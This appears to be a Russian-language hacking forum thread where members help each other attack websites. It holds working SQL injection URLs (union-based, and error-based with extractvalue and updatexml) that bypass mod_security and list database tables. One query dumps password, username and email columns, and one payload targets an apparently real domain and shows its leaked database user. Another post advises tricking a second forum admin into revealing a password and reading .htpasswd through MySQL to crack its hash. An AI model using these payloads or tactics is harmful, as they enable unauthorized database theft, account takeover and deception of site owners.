Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Ошибка скрипта вроде как.
     
  2. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://site.ru/news-post.php?id=-1'+/*!50000Union*/+Select+1,schema_name,3,4,5,6+From+/*!information_schema.schemata+limit+0,2*/+--+sp
    стоит mod_security, выводит только 1 базу, с таблицами также! добавлял limit и group_concat, таже фигня mod_security не ругается, что может быть?

    version:
    5.5.42-37.1-log
     
    #1282 demafly76, 26 Aug 2016
    Last edited: 26 Aug 2016
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    можно исходники читать
     
  4. MaxxWell

    MaxxWell Banned

    Joined:
    5 Jan 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    В пм пожалуйста можешь описать в кратце как??
     
  5. MaxxWell

    MaxxWell Banned

    Joined:
    5 Jan 2016
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Всё уже.
     
    #1285 MaxxWell, 27 Aug 2016
    Last edited: 27 Aug 2016
  6. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Не много запутался) есть уязвимость:
    Code:
    http://www.site.ru/publ.html'*updatexml(1,concat(0x3A,user(),version()),1)*'
    version (5.1.69) а как мне вывести таблицы с information_schema....

    P.S совсем башка не варит, колят магнезию(
     
  7. demafly76

    demafly76 New Member

    Joined:
    14 Aug 2016
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+
     
    NonBlizz likes this.
  8. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.site.ru/pis.php/view/(2)union(select(1),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3)
    Вывел таблицы с БД.
    Допустим есть таблица pwd.pwd-users c колонками pass,uname,email как мне вывести их содержимое за помощь ++


    P.S Магнезия всё ещё долбит по шарам=)
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    select concat(pass,uname,email) from pwd.pwd-users
     
    NonBlizz likes this.
  10. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Я уже так пробовал)) итог пустая страница, с from pwd.pwd-user limit 1,1 тоже


    Точнее не то чтобы пустая страница, а просто не выводит инфу.

    from pwd.pwd-user идёт же перед 3) ?
     
    #1290 NonBlizz, 28 Aug 2016
    Last edited: 28 Aug 2016
  11. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Другой вектор error-based пробуй.
    Code:
    http://www.legalsteroid.ru/'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
    version: 5.5.50-MariaDB
    user: steroid_legal@localhost
    database: steroid_legal

    Дальше поймёшь?
     
  12. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://site.ru/info/1'or(ExtractValue(1,concat(0x3a,(select(database())))))='1
    Выводит...
    Подскажите как извлечь инфу из Information.schema.. На примере этого запроса...


    Пробывал так:
    Code:
    http://site.ru/info/1'or(extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))+--+
    выводит такую ошибку:

    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from+information_schema.tables+limit+0,1)))+--+') = 0 ) OR baner.id_baner IN (SE' at line 1



    При запросе:
    Code:
    http://site.ru/info/1'and(extractvalue(1,concat(0x3a,(select(table_name)from(information_schema.tables)))))='1
    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[21000]: Cardinality violation: 1242 Subquery returns more than 1 row

    Шо не так делаю?
     
    #1292 NonBlizz, 29 Aug 2016
    Last edited: 29 Aug 2016
  13. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    есть форум на булке,так же есть данные админа,на форуме получается залогиниться,но когда перехожу по адресу site.ru/forum/admincp/ ,там стоит бейсик авторизация,можно как то ее обойти?
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
    напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
     
    _________________________
    R3hab likes this.
  15. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    то есть пароль от форума и админки могут отличатся?
     
  16. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Подскажи мне с Error based плиз=) выше на 3 сообщения...
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    не от самой админки, а от бейсик авторизации. юзай СИ.

    http://site.ru/info/1'or extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
     
    _________________________
    NonBlizz and R3hab like this.
  18. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    8
    Reputations:
    6
    этот пароль в бд не хранится?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    нет, обычно хранится в файле .htpasswd (если там апач). если есть права на чтение файлов (file_priv=y) в MySQL то попробуй прочитать .htpasswd и расшифровать хэш. Там обычно хэш в формате md5(APR) или Des(Unix)
     
    _________________________
    NonBlizz and R3hab like this.
  20. NonBlizz

    NonBlizz Banned

    Joined:
    27 Aug 2016
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
    Code:
    http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1
    Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((